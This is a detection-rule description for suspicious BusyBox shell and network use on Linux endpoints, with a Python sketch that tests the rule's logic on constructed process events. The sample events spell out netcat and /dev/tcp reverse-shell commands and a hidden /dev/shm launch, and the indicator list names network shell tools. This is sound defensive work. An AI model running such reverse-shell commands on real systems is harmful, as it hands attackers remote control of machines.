
Summary
This rule detects suspicious use of BusyBox on Linux endpoints, specifically invocations that spawn a shell or establish network connections. Because BusyBox bundles many utilities in one binary, an attacker can proxy shell and network activity through it to gain command execution or command-and-control capability while evading detections keyed on the usual shell and network binaries.

The detection is an EQL query over Linux process start events where process.name is busybox, one of the process arguments is a shell (bash, dash, sh, etc.), and process.command_line contains an indicator of shell or network activity: nc/netcat, openssl, telnet, system/io.popen/os.execute/fsockopen, inet/tcp, /dev/tcp, /dev/udp, nohup, setsid, /dev/shm, ld-linux*.so, /tmp, /var/tmp, rm -rf, and similar. The query also inspects the parent process and excludes invocations wrapped by known benign parents (for example runc, make, process-wrapper) to reduce false positives.

The rule maps to MITRE ATT&CK Execution (T1059 Command and Scripting Interpreter, sub-technique T1059.004 Unix Shell), Command and Control (T1071 Application Layer Protocol), and Defense Evasion (T1218 System Binary Proxy Execution). Supported data sources are Elastic Defend and SentinelOne. An alert indicates potentially malicious BusyBox proxy execution on a Linux endpoint and warrants further investigation.
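The following Python block is an added illustration of the detection logic described above, run over a handful of constructed process events. It is not the rule's EQL and not Elastic's code: the field names follow ECS conventions (event.type, process.name, process.args, process.command_line, process.parent.name), and the shell list, indicator regexes and benign-parent set are this example's paraphrase of the summary, not the rule's exact query.

```python
"""Added example: approximate the BusyBox shell/network rule in Python and
run it over constructed process events. Not the rule's EQL or Elastic's code."""
import re
from dataclasses import dataclass

# Assumed shell names; the summary lists "bash, dash, sh, etc."
SHELLS = {"bash", "dash", "sh", "ash", "zsh"}

# Indicators paraphrased from the summary; the regex forms are this example's choice.
INDICATORS = [
    r"\bnc\b|\bnetcat\b", r"\bopenssl\b", r"\btelnet\b",
    r"\bsystem\(|io\.popen|os\.execute|fsockopen", r"\binet\b|\btcp\b",
    r"/dev/tcp|/dev/udp", r"\bnohup\b", r"\bsetsid\b", r"/dev/shm",
    r"ld-linux\S*\.so", r"/tmp", r"/var/tmp", r"rm -rf",
]
INDICATOR_RE = re.compile("|".join(f"(?:{p})" for p in INDICATORS))

# Assumed benign-parent exclusions taken from the summary's examples.
BENIGN_PARENTS = {"runc", "make", "process-wrapper"}


@dataclass
class ProcessEvent:
    event_type: str      # ECS event.type, e.g. "start"
    name: str            # process.name
    args: list           # process.args
    command_line: str    # process.command_line
    parent_name: str     # process.parent.name


def matches_rule(ev: ProcessEvent) -> bool:
    """Return True when the event satisfies every condition of the rule."""
    if ev.event_type != "start" or ev.name != "busybox":
        return False
    if not (SHELLS & set(ev.args)):            # BusyBox asked to run a shell applet
        return False
    if ev.parent_name in BENIGN_PARENTS:       # wrapped by a known-safe parent
        return False
    return INDICATOR_RE.search(ev.command_line) is not None


def detect(events):
    """Return the command lines of events the rule would alert on."""
    return [ev.command_line for ev in events if matches_rule(ev)]


# Constructed sample events (not real telemetry).
SAMPLE_EVENTS = [
    ProcessEvent("start", "busybox", ["busybox", "sh", "-c", "nc -e /bin/sh 10.0.0.1 4444"],
                 'busybox sh -c "nc -e /bin/sh 10.0.0.1 4444"', "cron"),
    ProcessEvent("start", "busybox", ["busybox", "sh", "-c", "bash -i >& /dev/tcp/10.0.0.1/4444 0>&1"],
                 'busybox sh -c "bash -i >& /dev/tcp/10.0.0.1/4444 0>&1"', "sshd"),
    # Same indicators, but the parent is an excluded build tool: suppressed.
    ProcessEvent("start", "busybox", ["busybox", "sh", "-c", "rm -rf /tmp/build && make all"],
                 'busybox sh -c "rm -rf /tmp/build && make all"', "make"),
    # No shell applet: the /tmp indicator alone is not enough.
    ProcessEvent("start", "busybox", ["busybox", "ls", "-la", "/tmp"],
                 "busybox ls -la /tmp", "bash"),
    # Shell applet but no indicator in the command line.
    ProcessEvent("start", "busybox", ["busybox", "sh", "-c", "echo hello"],
                 'busybox sh -c "echo hello"', "bash"),
    ProcessEvent("start", "busybox", ["busybox", "ash", "-c", "setsid nohup /dev/shm/x.elf &"],
                 'busybox ash -c "setsid nohup /dev/shm/x.elf &"', "systemd"),
]

if __name__ == "__main__":
    for line in detect(SAMPLE_EVENTS):
        print("ALERT:", line)
```

Running the block prints three alerts: the netcat reverse shell, the /dev/tcp reverse shell, and the setsid/nohup launch from /dev/shm; the build-tool invocation is suppressed by the parent exclusion, and the two remaining events fail the shell-argument and indicator conditions respectively. In the real rule the equivalent checks are expressed as EQL predicates on the same ECS fields.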
Categories
- Endpoint
- Linux
Data Sources
- Process
- Command
ATT&CK Techniques
- T1059
- T1059.004
- T1071
- T1218
Created: 2026-07-02